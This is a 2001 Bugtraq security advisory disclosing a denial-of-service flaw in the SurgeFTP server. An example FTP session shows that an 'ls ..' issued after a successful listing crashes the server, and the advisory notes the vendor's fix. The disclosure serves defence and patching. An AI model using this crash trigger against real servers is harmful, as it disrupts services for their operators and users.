Bugtraq: SurgeFTP Denial of Service

[SNS Research <vuln-dev () greyhack com>]

Strumpf Noir Society Advisories
! Public release !
<--#


-= SurgeFTP Denial of Service =-

Release date: Thursday, March 1, 2001


Introduction:

NetWin's SurgeFTP is an easy to manage and reliable FTP server with
detailed reporting and easy to use management features.

SurgeFTP is available for both the Unix/Linux and Windows flavours of
operating systems from the vendor's site: http://www.netwinsite.com


Problem:

Due to a design issue in the SurgeFTP server a denial of service
condition exists in it which could allow any user with local or shell
access to the host to crash the server. The problem resides in the
local handling of the directory listing command, which after first being
successfully initialized will die if followed by a "malformed" request.


Example:

# ftp localhost

Connected to testbak

220 SurgeFTP testbak (Version 1.0b)

User (testbak:(none)): anonymous

331 Password required for anonymous.

Password:

230- Alias      Real path       Access

230- /          /home           read

230 User anonymous logged in.

ftp> ls /

200 Port command successful.

150 Opening ASCII mode data connection for file list. (/)

226 Transfer complete.

ftp> ls ..

200 Port command successful.

150 Opening ASCII mode data connection for file list. (/..)

-> ftp get:Connection reset by peer


(..)


Solution:

Vendor has been notified and has verified the problem. Build v1.1h has
been released, which fixes this issue. It's available from
ftp://ftp.netwinsite.com/pub/surgeftp/


yadayadayada

Free sk8! (http://www.freesk8.org)

SNS Research is rfpolicy (http://www.wiretrip.net/rfp/policy.html)
compliant, all information is provided on AS IS basis.

EOF, but Strumpf Noir Society will return!